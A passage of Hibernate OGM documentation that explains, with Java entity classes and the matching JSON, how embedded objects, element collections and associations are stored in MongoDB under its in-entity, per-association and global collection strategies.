elements annotated with `@Embedded` or `@ElementCollection` as nested documents of the owning entity.\n\n.Embedded object\n====\n[source, JAVA]\n----\n@Entity\npublic class News {\n\n @Id\n private String id;\n private String title;\n\n @Embedded\n private NewsPaper paper;\n\n \/\/ getters, setters ...\n}\n\n@Embeddable\npublic class NewsPaper {\n\n private String name;\n private String owner;\n\n \/\/ getters, setters ...\n}\n----\n\n[source, JSON]\n----\n{\n \"_id\" : \"1234-5678-0123-4567\",\n \"title\": \"On the merits of NoSQL\",\n \"paper\": {\n \"name\": \"NoSQL journal of prophecies\",\n \"owner\": \"Delphy\"\n }\n}\n----\n====\n\n.@ElementCollection with primitive types\n====\n[source, JAVA]\n----\n@Entity\npublic class AccountWithPhone {\n\n @Id\n private String id;\n\n @ElementCollection\n private List<String> mobileNumbers;\n\n \/\/ getters, setters ...\n}\n----\n\nAccountWithPhone collection\n\n[source, JSON]\n----\n{\n \"_id\" : \"john_account\",\n \"mobileNumbers\" : [ \"+1-222-555-0222\", \"+1-202-555-0333\" ]\n}\n----\n====\n\n.@ElementCollection with one attribute\n====\n[source, JAVA]\n----\n@Entity\npublic class GrandMother {\n\n @Id\n private String id;\n\n @ElementCollection\n private List<GrandChild> grandChildren = new ArrayList<GrandChild>();\n\n \/\/ getters, setters ...\n}\n\n@Embeddable\npublic class GrandChild {\n\n private String name;\n\n \/\/ getters, setters ...\n}\n----\n\n[source, JSON]\n----\n{\n \"_id\" : \"df153180-c6b3-4a4c-a7da-d5de47cf6f00\",\n \"grandChildren\" : [ \"Luke\", \"Leia\" ]\n}\n----\n====\n\nThe class `GrandChild` has only one attribute `name`,\nthis means that Hibernate OGM doesn't need to store the name of the attribute.\n\nIf the nested document has two or more fields, like in the following example,\nHibernate OGM will store the name of the fields as well.\n\n.@ElementCollection with @OrderColumn\n====\n[source, JAVA]\n----\n@Entity\npublic class GrandMother {\n\n @Id\n private String id;\n\n @ElementCollection\n @OrderColumn( name = \"birth_order\" )\n private List<GrandChild> grandChildren = new ArrayList<GrandChild>();\n\n \/\/ getters, setters ...\n}\n\n@Embeddable\npublic class GrandChild {\n\n private String name;\n\n \/\/ getters, setters ...\n}\n----\n\n[source, JSON]\n----\n{\n \"_id\" : \"e3e1ed4e-c685-4c3f-9a67-a5aeec6ff3ba\",\n \"grandChildren\" :\n [\n {\n \"name\" : \"Luke\",\n \"birth_order\" : 0\n },\n {\n \"name\" : \"Leia\",\n \"birthorder\" : 1\n }\n ]\n}\n----\n====\n\n.@ElementCollection with Map of @Embeddable\n====\n[source, JAVA]\n----\n@Entity\npublic class ForumUser {\n\n\t@Id\n\tprivate String name;\n\n\t@ElementCollection\n\tprivate Map<String, JiraIssue> issues = new HashMap<>();\n\n \/\/ getters, setters ...\n}\n\n@Embeddable\npublic class JiraIssue {\n\n\tprivate Integer number;\n\tprivate String project;\n\n \/\/ getters, setters ...\n}\n----\n\n[source, JSON]\n----\n{\n \"_id\" : \"Jane Doe\",\n \"issues\" : {\n \"issueWithNull\" : {\n },\n \"issue2\" : {\n \"number\" : 2000,\n \"project\" : \"OGM\"\n },\n \"issue1\" : {\n \"number\" : 1253,\n \"project\" : \"HSEARCH\"\n }\n }\n}\n----\n====\n\n[NOTE]\n====\nYou can override the column name used for a property of an embedded object.\nBut you need to know that the default column name is the concatenation of the embedding property,\na `.` (dot) and the embedded property (recursively for several levels of embedded objects).\n\nThe MongoDB datastore treats dots specifically as it transforms them into nested documents.\nIf you want to override one column name and still keep the nested structure, don't forget the dots.\n\nThat's a bit abstract, so let's use an example.\n\n[source, JAVA]\n----\n@Entity\nclass Order {\n @Id String number;\n User user;\n Address shipping;\n @AttributeOverrides({\n @AttributeOverride(name=\"name\", column=@Column(name=\"delivery.provider\"),\n @AttributeOverride(name=\"expectedDelaysInDays\", column=@Column(name=\"delivery.delays\")\n })\n DeliveryProvider deliveryProvider;\n CreditCardType cardType;\n}\n\n\/\/ default columns\n@Embedded\nclass User {\n String firstname;\n String lastname;\n}\n\n\/\/ override one column\n@Embeddable\npublic Address {\n String street;\n @Column(name=\"shipping.dest_city\")\n String city;\n}\n\n\/\/ both columns overridden from the embedding side\n@Embeddable\npublic DeliveryProvider {\n String name;\n Integer expectedDelaysInDays;\n}\n\n\/\/ do not use dots in the overriding\n\/\/ and mix levels (bad form)\n@Embedded\nclass CreditCardType {\n String merchant;\n @Column(name=\"network\")\n String network;\n}\n----\n\n[source, JSON]\n----\n{\n \"_id\": \"123RF33\",\n \"user\": {\n \"firstname\": \"Emmanuel\",\n \"lastname\": \"Bernard\"\n },\n \"shipping\": {\n \"street\": \"1 av des Champs Elys\u00e9es\",\n \"dest_city\": \"Paris\"\n },\n \"delivery\": {\n \"provider\": \"Santa Claus Inc.\",\n \"delays\": \"1\"\n }\n \"network\": \"VISA\",\n \"cardType: {\n \"merchant\": \"Amazon\"\n }\n}\n----\n\nIf you share the same embeddable in different places, you can use JPA's `@AttributeOverride`\nto override columns from the embedding side.\nThis is the case of `DeliveryProvider` in our example.\n\nIf you omit the dot in one of the columns, this column will not be part of the nested document.\nThis is demonstrated by the `CreditCardType`.\nWe advise you against it.\nLike crossing streams, it is bad form.\nThis approach might not be supported in the future.\n====\n\n[[mongodb-associations]]\n==== Associations\n\nHibernate OGM MongoDB proposes three strategies to store navigation information for associations.\nThe three possible strategies are:\n\n* <<mongodb-in-entity-strategy, IN_ENTITY>> (default)\n* <<mongodb-association-document-strategy, ASSOCIATION_DOCUMENT>>, using a global collection for all associations\n* <<mongodb-collection-per-association-strategy, COLLECTION_PER_ASSOCIATION>>, using a dedicated collection for each association\n\nTo switch between these strategies, use of the three approaches to options:\n\n* annotate your entity with `@AssocationStorage` and `@AssociationDocumentStorage` annotations (see <<ogm-mongodb-annotation-configuration>>),\n* use the API for programmatic configuration (see <<ogm-mongodb-programmatic-configuration>>)\n* or specify a default strategy via the `hibernate.ogm.datastore.document.association_storage` and\n`hibernate.ogm.mongodb.association_document_storage` configuration properties.\n\n[[mongodb-in-entity-strategy]]\n===== In Entity strategy\n\n* <<mongodb-in-entity-to-one-associations, *-to-one associations>>\n* <<mongodb-in-entity-to-many-associations, *-to-many associations>>\n\nIn this strategy, Hibernate OGM stores the id(s) of the associated entity(ies)\ninto the entity document itself.\nThis field stores the id value for to-one associations and an array of id values for to-many associations.\nAn embedded id will be represented by a nested document.\nFor indexed collections (i.e. `List` or `Map`), the index will be stored along the id.\n\n[NOTE]\n====\nWhen using this strategy the annotations `@JoinTable` will be ignored because no collection is created\nfor associations.\n\nYou can use `@JoinColumn` to change the name of the field that stores the foreign key (as an example, see\n<<mongodb-in-entity-one-to-one-join-column>>).\n====\n\n[[mongodb-in-entity-to-one-associations]]\n===== To-one associations\n\n.Unidirectional one-to-one\n====\n[source, JAVA]\n----\n@Entity\npublic class Vehicle {\n\n @Id\n private String id;\n private String brand;\n\n \/\/ getters, setters ...\n}\n\n\n@Entity\npublic class Wheel {\n\n @Id\n private String id;\n private double diameter;\n\n @OneToOne\n private Vehicle vehicle;\n\n \/\/ getters, setters ...\n}\n----\n\n[source, JSON]\n----\n{\n \"_id\" : \"V_01\",\n \"brand\" : \"Mercedes\"\n}\n----\n\nWheel collection as JSON in MongoDB\n\n[source, JSON]\n----\n{\n \"_id\" : \"W001\",\n \"diameter\" : 0,\n \"vehicle_id\" : \"V_01\"\n}\n----\n====\n\n[[mongodb-in-entity-one-to-one-join-column]]\n.Unidirectional one-to-one with @JoinColumn\n====\n[source, JAVA]\n----\n@Entity\npublic class Vehicle {\n\n @Id\n private String id;\n private String brand;\n\n \/\/ getters, setters ...\n}\n\n\n@Entity\npublic class Wheel {\n\n @Id\n private String id;\n private double diameter;\n\n @OneToOne\n @JoinColumn( name = \"part_of\" )\n private Vehicle vehicle;\n\n \/\/ getters, setters ...\n}\n----\n\n[source, JSON]\n----\n{\n \"_id\" : \"V_01\",\n \"brand\" : \"Mercedes\"\n}\n----\n\nWheel collection as JSON in MongoDB\n\n[source, JSON]\n----\n{\n \"_id\" : \"W001\",\n \"diameter\" : 0,\n \"part_of\" : \"V_01\"\n}\n----\n====\n\nIn a true one-to-one association, it is possible to share the same id between the two entities\nand therefore a foreign key is not required. You can see how to map this type of association in\nthe following example:\n\n.Unidirectional one-to-one with @MapsId and @PrimaryKeyJoinColumn\n====\n[source, JAVA]\n----\n@Entity\npublic class Vehicle {\n\n @Id\n private String id;\n private String brand;\n\n \/\/ getters, setters ...\n}\n\n@Entity\npublic class Wheel {\n\n @Id\n private String id;\n private double diameter;\n\n @OneToOne\n @PrimaryKeyJoinColumn\n @MapsId\n private Vehicle vehicle;\n\n \/\/ getters, setters ...\n}\n----\n\nVehicle collection as JSON in MongoDB\n\n[source, JSON]\n----\n{\n \"_id\" : \"V_01\",\n \"brand\" : \"Mercedes\"\n}\n----\n\nWheel collection as JSON in MongoDB\n\n[source, JSON]\n----\n{\n \"_id\" : \"V_01\",\n \"diameter\" : 0,\n}\n----\n====\n\n.Bidirectional one-to-one\n====\n[source, JAVA]\n----\n@Entity\npublic class Husband {\n\n @Id\n private String id;\n private String name;\n\n @OneToOne\n private Wife wife;\n\n \/\/ getters, setters ...\n}\n\n@Entity\npublic class Wife {\n\n @Id\n private String id;\n private String name;\n\n @OneToOne\n private Husband husband;\n\n \/\/ getters, setters ...\n}\n----\n\nHusband collection as JSON in MongoDB\n\n[source, JSON]\n----\n{\n \"_id\" : \"alex\",\n \"name\" : \"Alex\",\n \"wife\" : \"bea\"\n}\n----\n\nWife collection as JSON in MongoDB\n\n[source, JSON]\n----\n{\n \"_id\" : \"bea\",\n \"name\" : \"Bea\",\n \"husband\" : \"alex\"\n}\n----\n====\n\n.Bidirectional one-to-one (Mapping to the same Entity)\n====\n[source, JAVA]\n----\n@Entity\npublic class Person {\n\n @Id\n private String id;\n private String name;\n\n @OneToOne\n private Person spouse;\n\n \/\/ getters, setters ...\n}\n----\n\nPerson (husband) collection as JSON in MongoDB\n\n[source, JSON]\n----\n{\n \"_id\" : \"alex\",\n \"name\" : \"Alex\",\n \"spouse\" : \"bea\"\n}\n----\n\nPerson (wife) collection as JSON in MongoDB\n\n[source, JSON]\n----\n{\n \"_id\" : \"bea\",\n \"name\" : \"Bea\",\n \"spouse\" : \"alex\"\n}\n----\n====\n\n.Unidirectional many-to-one\n====\n[source, JAVA]\n----\n@Entity\npublic class JavaUserGroup {\n\n @Id\n private String jugId;\n private String name;\n\n \/\/ getters, setters ...\n}\n\n@Entity\npublic class Member {\n\n @Id\n private String id;\n private String name;\n\n @ManyToOne\n private JavaUserGroup memberOf;\n\n \/\/ getters, setters ...\n}\n----\n\nJavaUserGroup collection as JSON in MongoDB\n\n[source, JSON]\n----\n{\n \"_id\" : \"summer_camp\",\n \"name\" : \"JUG Summer Camp\"\n}\n----\n\nMember collection as JSON in MongoDB\n\n[source, JSON]\n----\n{\n \"_id\" : \"jerome\",\n \"name\" : \"Jerome\"\n \"memberOf_jugId\" : \"summer_camp\"\n}\n{\n \"_id\" : \"emmanuel\",\n \"name\" : \"Emmanuel Bernard\"\n \"memberOf_jugId\" : \"summer_camp\"\n}\n----\n====\n\n.Bidirectional many-to-one\n====\n[source, JAVA]\n----\n@Entity\npublic class SalesForce {\n\n @Id\n private String id;\n private String corporation;\n\n @OneToMany(mappedBy = \"salesForce\")\n private Set<SalesGuy> salesGuys = new HashSet<SalesGuy>();\n\n \/\/ getters, setters ...\n}\n\n@Entity\npublic class SalesGuy {\n private String id;\n private String name;\n\n @ManyToOne\n private SalesForce salesForce;\n\n \/\/ getters, setters ...\n}\n----\n\nSalesForce collection\n\n[source, JSON]\n----\n{\n \"_id\" : \"red_hat\",\n \"corporation\" : \"Red Hat\",\n \"salesGuys\" : [ \"eric\", \"simon\" ]\n}\n----\n\nSalesGuy collection\n\n[source, JSON]\n----\n{\n \"_id\" : \"eric\",\n \"name\" : \"Eric\"\n \"salesForce_id\" : \"red_hat\",\n}\n{\n \"_id\" : \"simon\",\n \"name\" : \"Simon\",\n \"salesForce_id\" : \"red_hat\"\n}\n----\n====\n\n.Bidirectional many-to-one between entities with embedded ids\n====\n[source, JAVA]\n----\n@Entity\npublic class Game {\n\n @EmbeddedId\n private GameId id;\n\n private String name;\n\n @ManyToOne\n private Court playedOn;\n\n \/\/ getters, setters ...\n}\n\n\npublic class GameId implements Serializable {\n\n private String category;\n\n @Column(name = \"id.gameSequenceNo\")\n private int sequenceNo;\n\n \/\/ getters, setters ...\n \/\/ equals \/ hashCode\n}\n\n@Entity\npublic class Court {\n\n @EmbeddedId\n private CourtId id;\n\n private String name;\n\n @OneToMany(mappedBy = \"playedOn\")\n private Set<Game> games = new HashSet<Game>();\n\n \/\/ getters, setters ...\n}\n\npublic class CourtId implements Serializable {\n\n private String countryCode;\n private int sequenceNo;\n\n \/\/ getters, setters ...\n \/\/ equals \/ hashCode\n}\n----\n\n.Court collection\n[source, JSON]\n----\n{\n \"_id\" : {\n \"countryCode\" : \"DE\",\n \"sequenceNo\" : 123\n },\n \"name\" : \"Hamburg Court\",\n \"games\" : [\n { \"gameSequenceNo\" : 457, \"category\" : \"primary\" },\n { \"gameSequenceNo\" : 456, \"category\" : \"primary\" }\n ]\n}\n----\n\n.Game collection\n[source, JSON]\n----\n{\n \"_id\" : {\n \"category\" : \"primary\",\n \"gameSequenceNo\" : 456\n },\n \"name\" : \"The game\",\n \"playedOn_id\" : {\n \"countryCode\" : \"DE\",\n \"sequenceNo\" : 123\n }\n}\n{\n \"_id\" : {\n \"category\" : \"primary\",\n \"gameSequenceNo\" : 457\n },\n \"name\" : \"The other game\",\n \"playedOn_id\" : {\n \"countryCode\" : \"DE\",\n \"sequenceNo\" : 123\n }\n}\n----\n====\n\nHere we see that the embedded id is represented as a nested document\nand directly referenced by the associations.\n\n[[mongodb-in-entity-to-many-associations]]\n===== To-many associations\n\n.Unidirectional one-to-many\n====\n[source, JAVA]\n----\n@Entity\npublic class Basket {\n\n @Id\n private String id;\n\n private String owner;\n\n @OneToMany\n private List<Product> products = new ArrayList<Product>();\n\n \/\/ getters, setters ...\n}\n\n@Entity\npublic class Product {\n\n @Id\n private String name;\n\n private String description;\n\n \/\/ getters, setters ...\n}\n----\n\nBasket collection\n\n[source, JSON]\n----\n{\n \"_id\" : \"davide_basket\",\n \"owner\" : \"Davide\",\n \"products\" : [ \"Beer\", \"Pretzel\" ]\n}\n----\n\nProduct collection\n\n[source, JSON]\n----\n{\n \"_id\" : \"Pretzel\",\n \"description\" : \"Glutino Pretzel Sticks\"\n}\n{\n \"_id\" : \"Beer\",\n \"description\" : \"Tactical nuclear penguin\"\n}\n----\n====\n\n.Unidirectional one-to-many with @OrderColumn\n====\n[source, JAVA]\n----\n@Entity\npublic class Basket {\n\n @Id\n private String id;\n\n private String owner;\n\n @OneToMany\n private List<Product> products = new ArrayList<Product>();\n\n \/\/ getters, setters ...\n}\n\n@Entity\npublic class Product {\n\n @Id\n private String name;\n\n private String description;\n\n \/\/ getters, setters ...\n}\n----\n\nBasket collection\n\n[source, JSON]\n----\n{\n \"_id\" : \"davide_basket\",\n \"owner\" : \"Davide\",\n \"products\" : [\n {\n \"products_name\" : \"Pretzel\",\n \"products_ORDER\" : 1\n },\n {\n \"products_name\" : \"Beer\",\n \"products_ORDER\" : 0\n }\n ]\n}\n----\n\nProduct collection\n[source, JSON]\n----\n{\n \"_id\" : \"Pretzel\",\n \"description\" : \"Glutino Pretzel Sticks\"\n}\n{\n \"_id\" : \"Beer\",\n \"description\" : \"Tactical nuclear penguin\"\n}\n----\n====\n\nA map can be used to represent an association,\nin this case Hibernate OGM will store the key of the map\nand the associated id.\n\n.Unidirectional one-to-many using maps with defaults\n====\n[source, JAVA]\n----\n@Entity\npublic class User {\n\n @Id\n private String id;\n\n @OneToMany\n private Map<String, Address> addresses = new HashMap<String, Address>();\n\n \/\/ getters, setters ...\n}\n\n@Entity\npublic class Address {\n\n @Id\n private String id;\n private String city;\n\n \/\/ getters, setters ...\n}\n----\n\nUser collection as JSON in MongoDB\n\n[source, JSON]\n----\n{\n \"_id\" : \"user_001\",\n \"addresses\" : [\n {\n \"work\" : \"address_001\",\n \"home\" : \"address_002\"\n }\n ]\n}\n----\n\nAddress collection as JSON in MongoDB\n\n[source, JSON]\n----\n{ \"_id\" : \"address_001\", \"city\" : \"Rome\" }\n{ \"_id\" : \"address_002\", \"city\" : \"Paris\" }\n----\n====\n\nIf the map value cannot be represented by a single field (e.g. when referencing a type with a composite id\nor using an embeddable type as map value type),\na sub-document containing all the required fields will be stored as value.\n\nIf the map key either is not of type `String` or it is made up of several columns (composite map key),\nthe optimized structure shown in the example above cannot be used as MongoDB only allows for Strings as field names.\nIn that case the association will be represented by a list of sub-documents, also containing the map key column(s).\nYou can use `@MapKeyColumn` to rename the field containing the key of the map,\notherwise it will default to \"<%COLLECTION_ROLE%>_KEY\", e.g. \"addresses_KEY\".\n\n.Unidirectional one-to-many using maps with @MapKeyColumn\n====\n[source, JAVA]\n----\n@Entity\npublic class User {\n\n @Id\n private String id;\n\n @OneToMany\n @MapKeyColumn(name = \"addressType\")\n private Map<Long, Address> addresses = new HashMap<Long, Address>();\n\n \/\/ getters, setters ...\n}\n\n@Entity\npublic class Address {\n\n @Id\n private String id;\n private String city;\n\n \/\/ getters, setters ...\n}\n----\n\nUser collection as JSON in MongoDB\n\n[source, JSON]\n----\n{\n \"_id\" : \"user_001\",\n \"addresses\" : [\n {\n \"addressType\" : 1,\n \"addresses_id\" : \"address_001\"\n },\n {\n \"addressType\" : 2,\n \"addresses_id\" : \"address_002\"\n }\n ]\n}\n----\n\nAddress collection as JSON in MongoDB\n\n[source, JSON]\n----\n{ \"_id\" : \"address_001\", \"city\" : \"Rome\" }\n{ \"_id\" : \"address_002\", \"city\" : \"Paris\" }\n----\n====\n\nIn case you want to enforce the list-style represention also for maps with a single key column of type `String`\n(e.g. when reading back data persisted by earlier versions of Hibernate OGM),\nyou can do so by setting the option `hibernate.ogm.datastore.document.map_storage` to the value `AS_LIST`.\n\n.Unidirectional many-to-many using in entity strategy\n====\n[source, JAVA]\n----\n@Entity\npublic class Student {\n\n @Id\n private String id;\n private String name;\n\n \/\/ getters, setters ...\n}\n\n@Entity\npublic class ClassRoom {\n\n @Id\n private long id;\n private String lesson;\n\n @ManyToMany\n private List<Student> students = new ArrayList<Student>();\n\n \/\/ getters, setters ...\n}\n----\n\nStudent collection\n\n[source, JSON]\n----\n{\n \"_id\" : \"john\",\n \"name\" :\"John Doe\" }\n{\n \"_id\" : \"mario\",\n \"name\" : \"Mario Rossi\"\n}\n{\n \"_id\" : \"kate\",\n \"name\" : \"Kate Doe\"\n}\n----\n\nClassRoom collection\n\n[source, JSON]\n----\n{\n \"_id\" : NumberLong(1),\n \"lesson\" : \"Math\"\n \"students\" : [\n \"mario\",\n \"john\"\n ]\n}\n{\n \"_id\" : NumberLong(2),\n \"lesson\" : \"English\"\n \"students\" : [\n \"mario\",\n \"kate\"\n ]\n}\n----\n====\n\n.Bidirectional many-to-many\n====\n[source, JAVA]\n----\n@Entity\npublic class AccountOwner {\n\n @Id\n private String id;\n\n private String SSN;\n\n @ManyToMany\n private Set<BankAccount> bankAccounts;\n\n \/\/ getters, setters ...\n}\n\n@Entity\npublic class BankAccount {\n\n @Id\n private String id;\n\n private String accountNumber;\n\n @ManyToMany( mappedBy = \"bankAccounts\" )\n private Set<AccountOwner> owners = new HashSet<AccountOwner>();\n\n \/\/ getters, setters ...\n}\n----\n\nAccountOwner collection\n\n[source, JSON]\n----\n{\n \"_id\" : \"owner_1\",\n \"SSN\" : \"0123456\"\n \"bankAccounts\" : [ \"account_1\" ]\n}\n----\n\nBankAccount collection\n\n[source, JSON]\n----\n{\n \"_id\" : \"account_1\",\n \"accountNumber\" : \"X2345000\"\n \"owners\" : [ \"owner_1\", \"owner2222\" ]\n}\n----\n====\n\n.Ordered list with embedded id\n====\n[source, JAVA]\n----\n@Entity\npublic class Race {\n @EmbeddedId\n private RaceId raceId;\n\n @OrderColumn(name = \"ranking\")\n @OneToMany @JoinTable(name = \"Race_Runners\")\n private List<Runner> runnersByArrival = new ArrayList<Runner>();\n\n \/\/ getters, setters ...\n}\n\npublic class RaceId implements Serializable {\n private int federationSequence;\n private int federationDepartment;\n\n \/\/ getters, setters, equals, hashCode\n}\n\n@Entity\npublic class Runner {\n @EmbeddedId\n private RunnerId runnerId;\n private int age;\n\n \/\/ getters, setters ...\n}\n\npublic class RunnerId implements Serializable {\n private String firstname;\n private String lastname;\n\n \/\/ getters, setters, equals, hashCode\n}\n----\n\n.Race collection\n[source, JSON]\n----\n{\n \"_id\": {\n \"federationDepartment\": 75,\n \"federationSequence\": 23\n },\n \"runnersByArrival\": [{\n \"firstname\": \"Pere\",\n \"lastname\": \"Noel\",\n \"ranking\": 1\n }, {\n \"firstname\": \"Emmanuel\",\n \"lastname\": \"Bernard\",\n \"ranking\": 0\n }]\n}\n----\n\n.Runner collection\n[source, JSON]\n----\n{\n \"_id\": {\n \"firstname\": \"Pere\",\n \"lastname\": \"Noel\"\n },\n \"age\": 105\n} {\n \"_id\": {\n \"firstname\": \"Emmanuel\",\n \"lastname\": \"Bernard\"\n },\n \"age\": 37\n}\n----\n====\n\n[[mongodb-collection-per-association-strategy]]\n===== One collection per association strategy\n\nIn this strategy, Hibernate OGM creates a MongoDB collection per association\nin which it will store all navigation information for that particular association.\n\nThis is the strategy closest to the relational model.\nIf an entity A is related to B and C, 2 collections will be created.\nThe name of this collection is made of the association table concatenated with `associations_`.\n\nFor example, if the `BankAccount` and `Owner` are related,\nthe collection used to store will be named `associations_Owner_BankAccount`. You can rename\nThe prefix is useful to quickly identify the association collections from the entity collections.\nYou can also decide to rename the collection representing the association using `@JoinTable`\n(see <<mongodb-one-collection-strategy-join-table, an example>>)\n\nEach document of an association collection has the following structure:\n\n* `_id` contains the id of the owner of relationship\n* `rows` contains all the id of the related entities\n\n[NOTE]\n====\nThe preferred approach is to use the <<mongodb-in-entity-strategy, in-entity strategy>>\nbut this approach can alleviate the problem of having documents that are too big.\n====\n\n.Unidirectional relationship\n====\n[source, JSON]\n----\n{\n \"_id\" : { \"owners_id\" : \"owner0001\" },\n \"rows\" : [\n \"accountABC\",\n \"accountXYZ\"\n ]\n}\n----\n====\n\n.Bidirectional relationship\n====\n[source, JSON]\n----\n{\n \"_id\" : { \"owners_id\" : \"owner0001\" },\n \"rows\" : [ \"accountABC\", \"accountXYZ\" ]\n}\n{\n \"_id\" : { \"bankAccounts_id\" : \"accountXYZ\" },\n \"rows\" : [ \"owner0001\" ]\n}\n----\n====\n\n[NOTE]\n====\nThis strategy won't affect *-to-one associations or embedded collections.\n====\n\n.Unidirectional one-to-many using one collection per strategy\n====\n[source, JAVA]\n----\n@Entity\npublic class Basket {\n\n @Id\n private String id;\n\n private String owner;\n\n @OneToMany\n private List<Product> products = new ArrayList<Product>();\n\n \/\/ getters, setters ...\n}\n\n@Entity\npublic class Product {\n\n @Id\n private String name;\n\n private String description;\n\n \/\/ getters, setters ...\n}\n----\n\nBasket collection\n\n[source, JSON]\n----\n{\n \"_id\" : \"davide_basket\",\n \"owner\" : \"Davide\"\n}\n----\n\nProduct collection\n[source, JSON]\n----\n{\n \"_id\" : \"Pretzel\",\n \"description\" : \"Glutino Pretzel Sticks\"\n}\n{\n \"_id\" : \"Beer\",\n \"description\" : \"Tactical nuclear penguin\"\n}\n----\n\nassociations_Basket_Product collection\n[source, JSON]\n----\n{\n \"_id\" : { \"Basket_id\" : \"davide_basket\" },\n \"rows\" : [ \"Beer\", \"Pretzel\" ]\n}\n----\n====\n\nThe order of the element in the list might be preserved using @OrderColumn.\nHibernate OGM will store the order adding an additional fieldd to the document\ncontaining the association.\n\n.Unidirectional one-to-many using one collection per strategy with @OrderColumn\n====\n[source, JAVA]\n----\n@Entity\npublic class Basket {\n\n @Id\n private String id;\n\n private String owner;\n\n @OneToMany\n @OrderColumn\n private List<Product> products = new ArrayList<Product>();\n\n \/\/ getters, setters ...\n}\n\n@Entity\npublic class Product {\n\n @Id\n private String name;\n\n private String description;\n\n \/\/ getters, setters ...\n}\n----\n\nBasket collection\n\n[source, JSON]\n----\n{\n \"_id\" : \"davide_basket\",\n \"owner\" : \"Davide\"\n}\n----\n\nProduct collection\n\n[source, JSON]\n----\n{\n \"_id\" : \"Pretzel\",\n \"description\" : \"Glutino Pretzel Sticks\"\n}\n{\n \"_id\" : \"Beer\",\n \"description\" : \"Tactical nuclear penguin\"\n}\n----\n\nassociations_Basket_Product collection\n\n[source, JSON]\n----\n{\n \"_id\" : { \"Basket_id\" : \"davide_basket\" },\n \"rows\" : [\n {\n \"products_name\" : \"Pretzel\",\n \"products_ORDER\" : 1\n },\n {\n \"products_name\" : \"Beer\",\n \"products_ORDER\" : 0\n }\n ]\n}\n----\n====\n\n.Unidirectional many-to-many using one collection per association strategy\n====\n[source, JAVA]\n----\n@Entity\npublic class Student {\n\n @Id\n private String id;\n private String name;\n\n \/\/ getters, setters ...\n}\n\n@Entity\npublic class ClassRoom {\n\n @Id\n private long id;\n private String lesson;\n\n @ManyToMany\n private List<Student> students = new ArrayList<Student>();\n\n \/\/ getters, setters ...\n}\n----\n\nStudent collection\n\n[source, JSON]\n----\n{\n \"_id\" : \"john\",\n \"name\" : \"John Doe\"\n}\n{\n \"_id\" : \"mario\",\n \"name\" : \"Mario Rossi\"\n}\n{\n \"_id\" : \"kate\",\n \"name\" : \"Kate Doe\"\n}\n----\n\nClassRoom collection\n\n[source, JSON]\n----\n{\n \"_id\" : NumberLong(1),\n \"lesson\" : \"Math\"\n}\n{\n \"_id\" : NumberLong(2),\n \"lesson\" : \"English\"\n}\n----\n\nassociations_ClassRoom_Student\n\n[source, JSON]\n----\n{\n \"_id\" : {\n \"ClassRoom_id\" : NumberLong(1),\n },\n \"rows\" : [ \"john\", \"mario\" ]\n}\n{\n \"_id\" : {\n \"ClassRoom_id\" : NumberLong(2),\n },\n \"rows\" : [ \"mario\", \"kate\" ]\n}\n----\n====\n\n.Bidirectional many-to-many using one collection per association strategy\n====\n[source, JAVA]\n----\n@Entity\npublic class AccountOwner {\n\n @Id\n private String id;\n\n private String SSN;\n\n @ManyToMany\n private Set<BankAccount> bankAccounts;\n\n \/\/ getters, setters ...\n}\n\n@Entity\npublic class BankAccount {\n\n @Id\n private String id;\n\n private String accountNumber;\n\n @ManyToMany(mappedBy = \"bankAccounts\")\n private Set<AccountOwner> owners = new HashSet<AccountOwner>();\n\n \/\/ getters, setters ...\n}\n----\n\nAccountOwner collection\n\n[source, JSON]\n----\n{\n \"_id\" : \"owner_1\",\n \"SSN\" : \"0123456\"\n}\n----\n\nBankAccount collection\n\n[source, JSON]\n----\n{\n \"_id\" : \"account_1\",\n \"accountNumber\" : \"X2345000\"\n}\n----\n\nassociations_AccountOwner_BankAccount collection\n\n[source, JSON]\n----\n{\n \"_id\" : {\n \"bankAccounts_id\" : \"account_1\"\n },\n \"rows\" : [ \"owner_1\" ]\n}\n{\n \"_id\" : {\n \"owners_id\" : \"owner_1\"\n },\n \"rows\" : [ \"account_1\" ]\n}\n----\n====\n\n[[mongodb-one-collection-strategy-join-table]]\nYou can change the name of the collection containing the association using the `@JoinTable` annotation.\nIn the following example, the name of the collection containing the association is `OwnerBankAccounts`\n(instead of the default `associations_AccountOwner_BankAccount`)\n\n.Bidirectional many-to-many using one collection per association strategy and @JoinTable\n====\n[source, JAVA]\n----\n@Entity\npublic class AccountOwner {\n\n @Id\n private String id;\n\n private String SSN;\n\n @ManyToMany\n @JoinTable( name = \"OwnerBankAccounts\" )\n private Set<BankAccount> bankAccounts;\n\n \/\/ getters, setters ...\n}\n\n@Entity\npublic class BankAccount {\n\n @Id\n private String id;\n\n private String accountNumber;\n\n @ManyToMany(mappedBy = \"bankAccounts\")\n private Set<AccountOwner> owners = new HashSet<AccountOwner>();\n\n \/\/ getters, setters ...\n}\n----\n\nAccountOwner collection\n\n[source, JSON]\n----\n{\n \"_id\" : \"owner_1\",\n \"SSN\" : \"0123456\"\n}\n----\n\nBankAccount collection\n\n[source, JSON]\n----\n{\n \"_id\" : \"account_1\",\n \"accountNumber\" : \"X2345000\"\n}\n----\n\nOwnerBankAccount\n\n[source, JSON]\n----\n{\n \"_id\" : {\n \"bankAccounts_id\" : \"account_1\"\n },\n \"rows\" : [ \"owner_1\" ]\n}\n{\n \"_id\" : {\n \"owners_id\" : \"owner_1\"\n },\n \"rows\" : [ \"account_1\" ]\n}\n----\n====\n\n[[mongodb-association-document-strategy]]\n===== Global collection strategy\n\nWith this strategy, Hibernate OGM creates a single collection named `Associations`\nin which it will store all navigation information for all associations.\nEach document of this collection is structured in 2 parts.\nThe first is the `_id` field which contains the identifier information\nof the association owner and the name of the association table.\nThe second part is the `rows` field which stores (into an embedded collection) all ids\nthat the current instance is related to.\n\n[NOTE]\n====\nThis strategy won't affect *-to-one associations or embedded collections.\n\nGenerally, you should not make use of this strategy\nunless embedding the association information proves to be too big for your document\nand you wish to separate them.\n====\n\n.Associations collection containing unidirectional association\n====\n[source, JSON]\n----\n{\n \"_id\": {\n \"owners_id\": \"owner0001\",\n \"table\": \"AccountOwner_BankAccount\"\n },\n \"rows\": [ \"accountABC\", \"accountXYZ\" ]\n}\n----\n====\n\nFor a bidirectional relationship, another document is created where ids are reversed.\nDon't worry, Hibernate OGM takes care of keeping them in sync:\n\n.Associations collection containing a bidirectional association\n====\n[source, JSON]\n----\n{\n \"_id\": {\n \"owners_id\": \"owner0001\",\n \"table\": \"AccountOwner_BankAccount\"\n },\n \"rows\": [ \"accountABC\", \"accountXYZ\" ]\n}\n{\n \"_id\": {\n \"bankAccounts_id\": \"accountXYZ\",\n \"table\": 